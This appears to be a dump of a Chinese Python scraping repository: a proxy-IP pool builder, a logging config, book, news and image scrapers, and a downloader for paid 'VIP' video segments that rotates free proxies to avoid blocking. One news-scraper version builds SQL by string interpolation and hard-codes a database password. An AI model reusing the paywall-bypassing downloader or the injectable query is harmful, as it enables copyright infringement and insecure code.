test.main.py 12 | | | 13 | | |-- __init__.py 14 | | |-- test_main.py| 存放核心逻辑 15 | | 16 | |-- config/ 配置文件 17 | | |-- __init__.py 18 | | |-- setting.py 写上相关配置 19 | | 20 | |---db/ 数据库文件 21 | | |--db.json 写数据库文件 22 | | 23 | |-- docs/ 相关文档说明 24 | | 25 | |-- examples/ 案例或者临时文件存放目录 26 | | 27 | |-- wiki/ wiki 28 | | 29 | |-- lib/ 库文件,放自定义模块和包 30 | | |-- __init__.py 31 | | |-- common.py 放常用的功能 32 | | 33 | |-- log/ 日志文件 34 | | |-- access.log 日志 35 | | 36 | |-- __init__.py 37 | |-- README 项目说明文件(内容说明,作者清单,版权声明,编译脚本) 38 | 39 | 注:运行程序时,在bin目录下执行start.py代码,不可以直接执行core下的模块。 40 | 41 | 关于README的内容,它需要说明以下几个事项: 42 | 软件定位,软件的基本功能。 43 | 运行代码的方法: 安装环境、启动命令等。 44 | 简要的使用说明。 45 | 代码目录结构说明,更详细点可以说明软件的基本原理。 46 | 常见问题说明。 47 | -------------------------------------------------------------------------------- /spider/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/4/6 22:45 8 | @File : __init__.py.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ -------------------------------------------------------------------------------- /spider/config/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/4/30 9:05 8 | @File : __init__.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ -------------------------------------------------------------------------------- /spider/config/ipPool.txt: -------------------------------------------------------------------------------- 
class RandomIp():
    """Scrape free proxies from xicidaili.com, persist them to a pool file,
    and hand out random IPs / proxies dicts from that pool.

    The pool file stores the ``str()`` of a Python list, e.g.
    ``"['http://1.2.3.4:80', 'http://5.6.7.8:81']"``; the readers below
    split on ``"', '"`` and drop the bracket-bearing end entries.
    """

    def __init__(self):
        self.XICI_URL = "https://www.xicidaili.com/nn/"
        self.TEST_URL = "https://www.jd.com/"  # used only to re-validate pooled IPs
        self.IP_POOL_FILE = "ip_pool.txt"
        self.MAX_PAGE_OF_XICI = 3614  # total result pages on xicidaili
        self.NUM_OF_PAGES = 2         # pages scraped per run
        # Random request headers; instantiating UserAgent() supplies its `self`.
        self.headers = user_agent.UserAgent().get_headers()

    def _pool_file_path(self):
        """Absolute path of the pool file, next to this module.

        Uses os.path.join (portable) instead of hard-coded '\\\\'; also fixes
        review_ip_pool, which previously opened a cwd-relative path while
        every other method used the module directory.
        """
        return os.path.join(os.path.dirname(__file__), self.IP_POOL_FILE)

    def get_target_pages(self, page):
        """Return NUM_OF_PAGES distinct random page numbers in [1, page)."""
        return random.sample(range(1, page), self.NUM_OF_PAGES)

    def request_get(self, url):
        """GET `url` with the randomized headers and a 10s timeout."""
        return requests.get(url, headers=self.headers, timeout=10)

    def analysis_page(self, req):
        """Parse one xicidaili result page.

        Keeps proxies whose speed and connect time are both under 0.5s.
        Returns strings shaped like 'http://1.2.3.4:80'.
        """
        result_ip_pool = []
        soup = bs(req.text, "lxml")
        ips = soup.find_all("tr")
        for i in range(1, len(ips)):  # row 0 is the table header
            try:
                tds = ips[i].find_all("td")
                temp_ip = str(tds[5].contents[0]).lower() + '://' + tds[1].contents[0] + ':' + tds[2].contents[0]
                speed = float(tds[6].div.get("title")[:-1])
                connect_time = float(tds[7].div.get("title")[:-1])
                if speed < 0.5 and connect_time < 0.5:
                    result_ip_pool.append(temp_ip)
            except Exception:
                # traceback.format_exc() takes no exception argument; the old
                # `format_exc(e)` call raised/ignored instead of logging.
                logging.error("解析IP参数异常!%s", traceback.format_exc())
        return result_ip_pool

    def get_ip_pool(self):
        """Scrape NUM_OF_PAGES random pages and return the harvested proxies."""
        result_ip_pool = []
        # Use `self` — the original re-instantiated RandomIp() per call,
        # rebuilding headers (and re-hitting the user-agent source) each time.
        for one_page in self.get_target_pages(self.MAX_PAGE_OF_XICI):
            one_page_url = self.XICI_URL + str(one_page)
            req = self.request_get(one_page_url)
            if req.status_code == 200:
                result_ip_pool.extend(self.analysis_page(req))
            else:
                # %s placeholder added: logging.error("…:", url) discarded the url.
                logging.error("连接异常!异常url:%s", one_page_url)
        return result_ip_pool

    def review_ip_pool(self):
        """Re-validate every pooled IP against TEST_URL and rewrite the file."""
        ip_pool_path = self._pool_file_path()
        try:
            with open(ip_pool_path, "r", encoding="utf-8") as f:
                content = f.read()
            ip_pool = content[2:len(content) - 2].split("', '")
            reduce_num = 0
            logging.info("IP池中待验证个数:{}".format(len(ip_pool)))
            for ip in ip_pool[:]:  # iterate a copy: entries are removed in-loop
                proxy = {ip.split("://")[0]: ip.split("://")[1]}
                try:
                    req = requests.get(self.TEST_URL, proxies=proxy, headers=self.headers, timeout=3)
                    if req.status_code != 200:
                        ip_pool.remove(ip)
                        reduce_num += 1
                    time.sleep(1)  # be polite to the test endpoint
                except Exception as e:
                    logging.error("ip异常:{},异常信息:{}".format(ip, str(e)))
                    ip_pool.remove(ip)
                    reduce_num += 1
            logging.info("IP池中已验证个数:{},减少个数:{}个".format(len(ip_pool), reduce_num))
            with open(ip_pool_path, "w", encoding="utf-8") as f:
                f.write(str(ip_pool))
            logging.info("IP池已更新!")
        except Exception as e:
            logging.error("重新验证IP池异常!异常信息:{}".format(e))

    def write_ip_to_file(self):
        """Append freshly scraped IPs to the pool file."""
        try:
            # Scrape exactly once: the original called get_ip_pool() twice
            # (once to write, once to log), doubling the network work.
            ip_pool = self.get_ip_pool()
            with open(self._pool_file_path(), "a+", encoding="utf-8") as f:
                f.write(str(ip_pool))
            logging.info("写入IP {} 个结束!".format(len(ip_pool)))
        except Exception:
            logging.error("IP写入文件异常!异常信息:%s", traceback.format_exc())

    def get_one_ip(self):
        """Return one random IP string from the pool file (None on failure)."""
        try:
            with open(self._pool_file_path(), "r", encoding="utf-8") as f:
                content = f.read()
            ip_list = content[1:len(content) - 1].split(", ")
            random_ip = random.choice(ip_list)  # choice() picks a single entry
            logging.info("random_ip: %s", random_ip)
            return random_ip
        except Exception:
            logging.error("IP读入文件异常!异常信息:%s", traceback.format_exc())

    def get_one_proxies(self):
        """Return a requests-style proxies dict from one random pooled IP."""
        try:
            with open(self._pool_file_path(), "r", encoding="utf-8") as f:
                content = f.read()
            ip_list = content[2:len(content) - 2].split("', '")
            random_ip = random.choice(ip_list)
            proxies = {"http": random_ip}
            logging.info("proxies: %s", str(proxies))
            return proxies
        except Exception:
            logging.error("IP读入文件异常!异常信息:%s", traceback.format_exc())

    def get_num_of_ip(self, num_of_ip):
        """Return `num_of_ip` distinct random IPs from the pool file."""
        try:
            with open(self._pool_file_path(), "r", encoding="utf-8") as f:
                content = f.read()
            cont_list = content.split("', '")
            ip_list = cont_list[1:len(cont_list) - 1]  # drop bracket-bearing ends
            random_ip_list = random.sample(ip_list, num_of_ip)  # sample() picks several
            logging.info("random_ip_list: %s", random_ip_list)
            return random_ip_list
        except Exception:
            logging.error("IP读入文件异常!异常信息:%s", traceback.format_exc())


if __name__ == '__main__':
    RandomIp().write_ip_to_file()
    RandomIp().review_ip_pool()
"""Project logging configuration.

Defines a ``dictConfig``-style dict with a console handler (active only
while ``debug_flag`` is True, via a custom filter) and a 5 MB rotating
file handler writing ``debug.log`` under the repository base directory.
"""

import logging
import logging.config
import os

path = os.path.abspath(__file__)
# Repository base directory: two levels above this file.
BASE_DIR = os.path.dirname(os.path.dirname(path))

# Set True in development, False in production, to toggle console output.
debug_flag = True


class RequireDebugTrue(logging.Filter):
    """Filter that passes records only while ``debug_flag`` is True."""

    def filter(self, record):
        return debug_flag


logging_config = {
    # Required; 1 is the only schema version currently defined.
    'version': 1,
    # Keep loggers created before this config is applied.
    'disable_existing_loggers': False,

    'filters': {
        'require_debug_true': {
            # '()' names the factory callable used to build the filter instance.
            '()': RequireDebugTrue,
        }
    },

    'formatters': {
        'simple': {
            'format': '%(asctime)s - %(name)s - %(levelname)s - %(message)s',
        },
    },

    'handlers': {
        # Console output, gated on debug_flag by the filter above.
        'console': {
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
            'formatter': 'simple',
            'filters': ['require_debug_true', ],
        },
        # Rotating file output: 5 MB per file, 5 backups, UTF-8.
        'log': {
            'level': 'DEBUG',
            'class': 'logging.handlers.RotatingFileHandler',
            'formatter': 'simple',
            'filename': os.path.join(BASE_DIR, 'debug.log'),
            'maxBytes': 1024 * 1024 * 5,
            'backupCount': 5,
            'encoding': 'utf8',
        },
    },

    'loggers': {
        'root': {
            'handlers': ['console', 'log'],
            'level': 'DEBUG',
            'propagate': True,  # forward records to parent loggers
        },
        'simple': {
            'handlers': ['console', 'log'],
            'level': 'WARN',
            'propagate': True,  # forward records to parent loggers
        }
    }
}
def getNumIpFromFile(self, num):
    """Read the proxy pool from ipPool.txt and return `num` random entries.

    The file holds the ``str()`` of a Python list, e.g.
    ``"['http://a:1', 'http://b:2', 'http://c:3']"``; splitting on "', '"
    and dropping the bracket-bearing first/last elements recovers the
    clean middle values. Returns None when the file cannot be read.
    """
    try:
        with open("ipPool.txt", "r", encoding="utf-8") as f:
            content = f.read()
        contList = content.split("', '")
        ipList = contList[1:len(contList) - 1]  # drop bracket-bearing ends
        randomIpList = random.sample(ipList, num)  # sample() picks several distinct
        return randomIpList
    except Exception:
        # Fixed: the original logged this as a *write* error ("IP写入文件异常")
        # even though this method only reads, passed the exception to
        # logging.error with no %s (dropping it), and misused
        # traceback.format_exc(e) — format_exc takes no exception argument.
        logging.error("IP读取文件异常!%s", traceback.format_exc())
## 2. fetch and parse one page
async def getContent(url):
    """Download `url` and extract the target paragraph via XPath.

    The ClientSession is used as an async context manager, so it closes
    itself — no explicit session.close() needed (avoids the
    "unclosed client session" warning).
    """
    async with aiohttp.ClientSession() as session:
        response = await session.get(url)  # session replaces a plain requests call
        page_text = await response.text()
        tree = etree.HTML(page_text)
        return tree.xpath("/html/body/div[1]/div[3]/ul/li[1]/div[4]/p/text()")

## 3. coroutine wrapper that awaits the fetch and prints its result
async def request(url):
    extracted = await getContent(url)
    print(extracted)

## 4./5. wrap each coroutine in a task and drive them all on one event loop
def even_loop(url_list):
    """Run `request` concurrently for every url in `url_list`."""
    pending = [asyncio.ensure_future(request(one_url)) for one_url in url_list]
    asyncio.get_event_loop().run_until_complete(asyncio.wait(pending))

if __name__ == '__main__':
    start = time.time()
    # https://www.guancha.cn/society/2018_08_29_470073.shtml
    url_list = ["url1", "url2", "..."]
    even_loop(url_list)
    print("cost time:", time.time()-start)
open("C:\\Users\\lenovo\\Desktop\\png\\" + str(i) + ".png", "wb") as f: 34 | f.write(img.content) 35 | time.sleep(2) 36 | 37 | if __name__ == '__main__': 38 | chrome_options = webdriver.ChromeOptions() 39 | chrome_options.add_argument('--headless') 40 | chrome_options.add_argument('--disable-gpu') 41 | 42 | chrome_options.add_argument( 43 | '--user-agent=Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') 44 | driver = webdriver.Chrome(chrome_options=chrome_options, 45 | executable_path="../otherfiles/chromedriver/chromedriver.exe") 46 | 47 | url_base = "http://m.360docs.net/doc/info-eef589567ed5360cba1aa8114431b90d6c85892d" 48 | 49 | for i in range(2, 95): 50 | url = url_base + "-" + str(i) + ".html" 51 | downOnePng(driver, url, i) 52 | 53 | 54 | -------------------------------------------------------------------------------- /spider/down_video/down_film.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 下载VIP视频 6 | -------------------------------------- 7 | @File : downFilm.py 8 | @Time : 2018/8/26 0:28 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | ''' 17 | IPO: 18 | input:.ts文件的url、.ts文件的个数 或者 m3u8文件 19 | process: 20 | 初始化配置参数(IP代理网页数,下载路径,视频名称,请求头部参数) 21 | 获得.ts文件的URI列表(包含文件链接地址及文件个数) 22 | 配置代理IP,选取随机IP地址进行文件下载 23 | 下载.ts文件 24 | 合并转换为MP4格式视频 25 | output:完成的MP4格式的视频 26 | 27 | 关键点: 28 | 1. 网页解析 29 | 2. m3u8解析 30 | 3. 设置动态代理 31 | 4. 调用DOS命令合并文件 32 | 33 | 难点: 34 | 1. 获得m3u8文件 35 | 2. 获取.ts文件的URI与个数 36 | 37 | 重点: 38 | 找到视频的m3u8文件(含有.ts文件的URI和个数) 39 | 40 | 注: 41 | 查看m3u8文件与.ts文件的过程: 42 | 1. 打开视频页面,审查元素。 43 | 2. 采用移动端的方式查看加载过程,即点击页面左上方的手机图标,然后刷新页面。 44 | 3. 
class VideoDownload():
    """Download a VIP video as numbered .ts segments (rotating proxy IPs)
    and merge them into a single MP4 via the DOS ``copy /b`` command."""

    def __init__(self):
        self.pageNum = 3  # pages of the proxy site to scrape; 100 IPs per page

        #################### begin: paths/urls below are per-video and may be edited ###################

        # Base URL of the numbered .ts files (iQiyi-style videos).
        self.url = "http://video2.fxsdp.com:8091/81820180315/JAVHD00054/650kb/hls/Vf6Uur2229"

        # m3u8 playlist URL (Tencent videos).
        self.TC_m3u8_url = "http://apd-983a0da8026d665ba14276af64267b05.v.smtcdns.com/vipts.tc.qq.com/A8_h69zsltM9kkOROl8Vx-l7g4JU8HQSrV-cE6aZ1uSc/SSXffv8zY6OTtSN-TvdRq_1UPxz2DDoymrbx04tr9kXcEXoqsDS-bUQNxi9ECFzDb0FC6fHlwXnBk3aN__auyD4rLuK7i9-Q7eCTkP8XE0qplasm_4UKUsyok_3nkKpoDIBP4GCk6THrBrsOST0EZxSi55wQO5Fh/0310_a0026o0eqrg.321002.ts.m3u8?ver=4"
        # .ts base URL (Tencent): combined with the .ts tails found in the
        # m3u8 file; taken from the request URL of a .ts load in devtools.
        self.TC_ts_url = "https://apd-983a0da8026d665ba14276af64267b05.v.smtcdns.com/vipts.tc.qq.com/A8_h69zsltM9kkOROl8Vx-l7g4JU8HQSrV-cE6aZ1uSc/SSXffv8zY6OTtSN-TvdRq_1UPxz2DDoymrbx04tr9kXcEXoqsDS-bUQNxi9ECFzDb0FC6fHlwXnBk3aN__auyD4rLuK7i9-Q7eCTkP8XE0qplasm_4UKUsyok_3nkKpoDIBP4GCk6THrBrsOST0EZxSi55wQO5Fh/"

        # Absolute Windows paths ("\\").
        self.m3u8Path = "E:\\delete\\temp.m3u8"      # temp location of the m3u8 file
        self.download_path = "E:\\delete\\DOWN"      # where .ts clips are downloaded
        self.final_path = "E:\\delete\\FINAL"        # where the merged video goes
        self.name = "resultFilmName"                 # merged video file name

        #################### end: paths/urls above are per-video and may be edited ###################

        self.headers = {
            'Connection': 'Keep-Alive',
            'Accept': 'text/html, application/xhtml+xml, */*',
            'Accept-Language': 'en-US,en;q=0.8,zh-Hans-CN;q=0.5,zh-Hans;q=0.3',
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'
        }

    def getURIList(self, count=1741):
        """Build the URI list of numbered .ts files (iQiyi-style videos).

        `count` is the number of segments (default keeps the original
        hard-coded 1741; check the resolver site for the real count).

        Fixed: the original's `<10`/`>100` branches produced "0100" for
        segment 100 (four digits instead of three), breaking the naming
        scheme; zfill(3) pads uniformly.
        """
        return [self.url + str(i).zfill(3) + ".ts" for i in range(1, count + 1)]

    def get_m3u8_uri(self):
        """Download and parse the m3u8 playlist (Tencent videos).

        Returns the full .ts URLs, or None if anything fails.
        """
        m3u8Content = requests.get(self.TC_m3u8_url)
        try:
            with open(self.m3u8Path, "w") as f:
                f.write(m3u8Content.text)
            uri_list = []
            # Read back and keep only the .ts entries as HTTP request tails.
            # (The original leaked this file handle — no close().)
            with open(self.m3u8Path, "r") as m3u8Cont:
                for line in m3u8Cont.readlines():
                    if ".ts" in line:
                        uri_list.append(self.TC_ts_url + line.strip())
            return uri_list
        except Exception:
            # Original referenced traceback.print_exception without calling it (a no-op).
            traceback.print_exc()

    def getIPList(self):
        """Scrape `pageNum` pages of the proxy site; return 'host:port' strings."""
        print("获取代理IP...")
        url = 'http://www.xicidaili.com/nn/'
        ipList = []
        for i in range(self.pageNum):
            newurl = url + str(i + 1)  # pages are 1-based
            r = requests.get(newurl, headers=self.headers)
            soup = bs(r.text, "html.parser")
            ips = soup.find_all("tr")
            for j in range(1, len(ips)):  # row 0 is the header row
                tds = ips[j].find_all("td")
                ipList.append(tds[1].string + ":" + tds[2].string)
        return ipList

    def getRandomIP(self, ipList):
        """Pick one random IP and wrap it as a requests proxies dict."""
        random_ip = random.choice(ipList)
        proxy_ip = "http://" + random_ip
        proxies = {"http": proxy_ip}
        return proxies

    def downloadFilm(self):
        """Download the .ts clips into download_path, rotating proxies."""
        print("开始下载...")
        start_time = time.time()
        os.chdir(self.download_path)  # clips are written relative to this dir
        ip_list = self.getIPList()
        proxies = self.getRandomIP(ip_list)

        uri_list = self.getURIList()      # iQiyi-style numbered segments
        # uri_list = self.get_m3u8_uri()  # Tencent: parse the m3u8 instead
        print(uri_list[:3])

        num = 1  # clip counter
        for uri in uri_list[:10]:
            if num % 5 == 0:
                print("更换代理IP")
                proxies = self.getRandomIP(ip_list)
            if num % 60 == 0:
                print("休眠10s")
                time.sleep(10)
            try:
                # Some hosts reject proxies; drop `proxies=` if requests fail.
                resp = requests.get(uri, headers=self.headers, proxies=proxies)
            except Exception:
                # Fixed: the original fell through here with `resp` unbound
                # (NameError on the write below) and mis-called
                # traceback.print_exception() with no arguments.
                traceback.print_exc()
                continue
            # zfill keeps clip numbering uniform (clip001 … clip100 … clip1741);
            # the original emitted "clip0100" for num == 100.
            name = 'clip%s.ts' % str(num).zfill(3)
            with open(name, "wb") as f:
                f.write(resp.content)
            print("正在下载clip%d" % num)
            num = num + 1
        print("下载完成!总共耗时 %0.3f min " % float((time.time() - start_time) / 60.0))

    def mergeFilm(self):
        """Merge every downloaded .ts (DOS `copy /b`) into one MP4."""
        mess = input("是否进行电影合并?(y/n)")
        if mess == "y":
            try:
                os.chdir(self.download_path)  # run the DOS command from the clip dir
                allFile = ''
                for file in os.listdir(self.download_path):
                    allFile = allFile + "+" + file
                allFileName = allFile[1:]  # drop the leading '+'
                # Join all clip names with '+' and let `copy /b` concatenate them.
                command = "copy /b " + allFileName + " /y %s\%s.mp4" % (self.final_path, self.name)  # DOS path separator
                os.system(command)
                print("合并完成...")
            except Exception:
                # Original referenced traceback.print_exception() incorrectly.
                traceback.print_exc()
        else:
            print("不合并电影,程序退出。")


if __name__ == "__main__":
    videoDownload = VideoDownload()
    videoDownload.downloadFilm()
    # videoDownload.mergeFilm()
def get_book_urls(url):
    """Fetch `url` with randomized headers (after a polite 2s delay) and
    return the page HTML as a string."""
    time.sleep(2)
    resp = requests.get(url=url, headers=user_agent.UserAgent().get_headers())
    return str(resp.text)


if __name__ == '__main__':
    base_url = "http://www.shicimingju.com"
    website_url = "http://www.shicimingju.com/book/"
    index_html = get_book_urls(website_url)

    index_tree = etree.HTML(index_html)
    books_list = index_tree.xpath('//*[@class="bookmark-list"]/ul/li/h2/a/@href')
    books_name = index_tree.xpath('//*[@class="bookmark-list"]/ul/li/h2/a/text()')

    # 1. full catalogue of books
    print("共 {} 本。".format(len(books_list)))

    book_dict = dict(zip(books_list, books_name))

    for url, name in book_dict.items():
        with open(name + ".txt", "w", encoding="utf-8") as f:
            # 2. table of contents for this book
            toc_tree = etree.HTML(get_book_urls(base_url + url))

            # chapter links of the book
            chapter_links = toc_tree.xpath('//*[@class="book-mulu"]/ul/li/a/@href')

            for chapter_link in chapter_links[:1]:
                # 3. body of one chapter
                chapter_tree = etree.HTML(get_book_urls(base_url + chapter_link))

                # chapter title
                chapter_title = chapter_tree.xpath('//*/h1/text()')
                # chapter paragraphs
                paragraphs = chapter_tree.xpath('//*[@class="chapter_content"]/p/text()')

                f.write(str(chapter_title))

                for paragraph in paragraphs:
                    f.write(paragraph)
def write2mysql(num, content):
    """Persist the scraped article body for news_id `num` into docList.

    Fixed: the SQL was built with %-string interpolation, which both broke
    on any quote character in the article text and was SQL-injectable;
    cursor.execute's parameter binding handles escaping. The connection is
    now also closed (it previously leaked on every call).
    """
    conn = pymysql.connect(host="localhost", user='root', password='123456789', database='news', charset='utf8')
    cursor = conn.cursor()
    # Parameterized query — values are bound by the driver, not interpolated.
    sql = "UPDATE docList SET content = %s WHERE news_id = %s"
    try:
        cursor.execute(sql, (content[0], num))
        conn.commit()
    except Exception:
        conn.rollback()
    finally:
        conn.close()
| 108 | 109 | # beginNum = 281189000 110 | # endNum = 281189001 111 | # beginTime = time.time() 112 | # 113 | # pool = Pool(4) 114 | # for num in range(beginNum, endNum): 115 | # try: 116 | # pool.map(run, run(num)) 117 | # pool.close() # 关闭进程池,不再接受新的进程 118 | # pool.join() # 主进程阻塞等待子进程的退出 119 | # except: 120 | # pass 121 | # continue 122 | # endTime = time.time() 123 | # usedTime = endTime - beginTime 124 | # print(usedTime) 125 | 126 | 127 | 128 | -------------------------------------------------------------------------------- /spider/get_html_new.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: get_html_new 5 | Description: 6 | Author: tebon 7 | Date: 2018/8/13 8 | ------------------------------------------------- 9 | Change Activity: 2018/8/13 10 | ------------------------------------------------- 11 | """ 12 | __author__ = 'tebon' 13 | 14 | 15 | import requests 16 | from lxml import etree 17 | import random 18 | import time 19 | from selenium import webdriver 20 | from multiprocessing import Pool 21 | import pymysql 22 | 23 | def getHTMLText(url): 24 | driver = webdriver.PhantomJS(executable_path='D:\\phantomjs-2.1.1-windows\\bin\\phantomjs') # phantomjs的绝对路径 25 | driver.set_page_load_timeout(1) 26 | time.sleep(1) 27 | driver.get(url) # 获取网页 28 | time.sleep(1) 29 | return driver.page_source 30 | 31 | def getContent(headers, html): 32 | struct = etree.HTML(html) 33 | # title = struct.xpath('/html/body/section/div[1]/h1/text()') 34 | content = struct.xpath('/html/body/section/div[2]/p/text()') 35 | # time = struct.xpath('/html/body/section/div[1]/p/span[2]/text()') 36 | # source = struct.xpath('/html/body/section/div[1]/p/span[1]/text()') 37 | # return title, content, time, source 38 | return content 39 | 40 | # def write2file(title, content, time, source): 41 | # conn = pymysql.connect(host="localhost", user='root', 
password='123456789', database = 'news', charset='utf8') 42 | # print(conn) 43 | # cursor = conn.cursor(); 44 | # cursor.execute("SELECT * FROM info") 45 | # data = cursor.fetchone() 46 | # print(data) 47 | # with open("./content.txt", "a+", encoding = "utf-8") as f: 48 | # f.write(''.join(title)) 49 | # f.write('\n') 50 | # f.write(''.join(content)) 51 | # f.write('\n\n') 52 | 53 | 54 | 55 | def write2mysql(num, content): 56 | conn = pymysql.connect(host="localhost", user='root', password='123456789', database = 'news', charset='utf8') 57 | cursor = conn.cursor(); 58 | sql = "UPDATE docList SET content = '%s' WHERE news_id = %s" % (content[0], num) 59 | print(sql) 60 | pass 61 | try: 62 | cursor.execute(sql) 63 | conn.commit() 64 | except: 65 | print("error: write to mysql! ") 66 | conn.rollback() 67 | 68 | def run(num): 69 | url = "http://localhost:92/zx/cont.html?id=" + str(num) + "&type=jrtt&flags=null" 70 | html = getHTMLText(url) 71 | content = getContent(headers, html) 72 | write2mysql(str(num), content) 73 | 74 | 75 | def get_news_id(): 76 | conn = pymysql.connect(host="localhost", user='root', password='123456789', database = 'news', charset='utf8') 77 | cursor = conn.cursor(); 78 | sql = "SELECT news_id FROM docList" 79 | try: 80 | cursor.execute(sql) 81 | result = cursor.fetchall() 82 | list = [] 83 | for one in result: 84 | list.append(one[0]) 85 | 86 | for newsid in list[38:39]: 87 | run(newsid) 88 | 89 | except: 90 | print("错误!") 91 | conn.rollback() 92 | 93 | 94 | 95 | 96 | if __name__ == '__main__': 97 | headers = { 98 | 'Connection': 'Keep-Alive', 99 | 'Accept': 'text/html, application/xhtml+xml, */*', 100 | 'Accept-Language': 'en-US,en;q=0.8,zh-Hans-CN;q=0.5,zh-Hans;q=0.3', 101 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36' 102 | } 103 | 104 | get_news_id() 105 | 106 | 107 | 108 | 109 | 110 | # beginNum = 281189000 111 | # endNum = 281189001 112 | # beginTime = 
time.time() 113 | # 114 | # pool = Pool(4) 115 | # for num in range(beginNum, endNum): 116 | # try: 117 | # pool.map(run, run(num)) 118 | # pool.close() # 关闭进程池,不再接受新的进程 119 | # pool.join() # 主进程阻塞等待子进程的退出 120 | # except: 121 | # pass 122 | # continue 123 | # endTime = time.time() 124 | # usedTime = endTime - beginTime 125 | # print(usedTime) 126 | 127 | 128 | 129 | -------------------------------------------------------------------------------- /spider/get_meizi_image.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 多线程爬取网站图片 6 | -------------------------------------- 7 | @File : getMeiziImage.py 8 | @Time : 2018/8/26 0:23 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | import requests 17 | from bs4 import BeautifulSoup 18 | import os 19 | from multiprocessing import Pool 20 | import sys 21 | from datetime import datetime 22 | import re 23 | import traceback 24 | 25 | headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Referer': 'http://www.mzitu.com'} 26 | Picreferer = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Referer': 'http://i.meizitu.net'} 27 | 28 | 29 | def request(url): 30 | try: 31 | html = requests.get(url, headers=headers) 32 | soup = BeautifulSoup(html.text, "lxml") # beautiful库解析 33 | return soup 34 | except: 35 | print("request请求链接异常!") 36 | traceback.print_exc() 37 | 38 | 39 | def get_MaxPage(href): 40 | try: 41 | html_soup = request(href) 42 | max_span = html_soup.find("div", class_="pagenavi").find_all("span")[-2].get_text() # 获取页数 43 | return max_span 44 | except: 45 | print("获取最大页数异常!") 46 | traceback.print_exc() 47 | 48 | def re2title(string): 49 | result = 
re.sub(r'\*|\?|\?|\:|\:|\||\&|\$|\@|\>|\<|\""|\'\'|\“”|\\|\/', "", string) 50 | return result 51 | 52 | 53 | def download(all_url, root_path, num): 54 | try: 55 | count = 0 56 | a_soup = request(all_url) 57 | all_a = a_soup.find("div", class_="all").find_all("a") # 20180308 11:50 共2693个 58 | print(len(all_a)) 59 | for a in all_a[1:int(num)]: 60 | title = a.get_text() 61 | href = a["href"] # 获取a标签的链接 62 | 63 | # makdirs 64 | newTitle = re2title(title) 65 | path = newTitle.strip() 66 | os.makedirs(os.path.join(root_path, path)) 67 | os.chdir(root_path + "\\" + path) 68 | 69 | max_span = get_MaxPage(href) 70 | 71 | for page in range(1, int(max_span) + 1): 72 | page_url = href + "/" + str(page) 73 | 74 | img_soup = request(page_url) 75 | 76 | img_url = img_soup.find("div", class_="main-image").find("img")["src"] 77 | name = img_url[-9: -4] # 截取 78 | img = requests.get(img_url, headers=Picreferer) 79 | f = open(name + ".jpg", "wb") 80 | f.write(img.content) 81 | f.close 82 | count += 1 83 | # print("完成:" + title) 多线程时无法执行 84 | print("完成:" + str(count / (num - 1) * 100) + "%") 85 | except: 86 | print("下载异常!") 87 | traceback.print_exc() 88 | 89 | 90 | def main(): 91 | all_url = 'http://www.mzitu.com/all' # 爬取链接入口 92 | root_path = "E:\\mzitu" # 本地存储根目录 93 | num = 4 # 爬取个数-1 94 | 95 | if not os.path.isdir(root_path): 96 | os.makedirs(root_path) 97 | 98 | start_time = datetime.now() 99 | print(start_time) 100 | 101 | # 方法1 102 | download(all_url, root_path, num) 103 | 104 | # 方法2 105 | ''' 106 | # 线程池个数,电脑CPU个数 107 | pool = Pool(4) 108 | for i in range(4): 109 | pool.apply_async(download, args = (all_url, root_path, num) ) # apply_async非阻塞且支持结果返回进行回调 110 | pool.close() 111 | pool.join() 112 | ''' 113 | 114 | end_time = datetime.now() 115 | print(end_time) 116 | print("程序耗时:") 117 | print(end_time - start_time) 118 | 119 | 120 | if __name__ == "__main__": 121 | main() 122 | 123 | -------------------------------------------------------------------------------- 
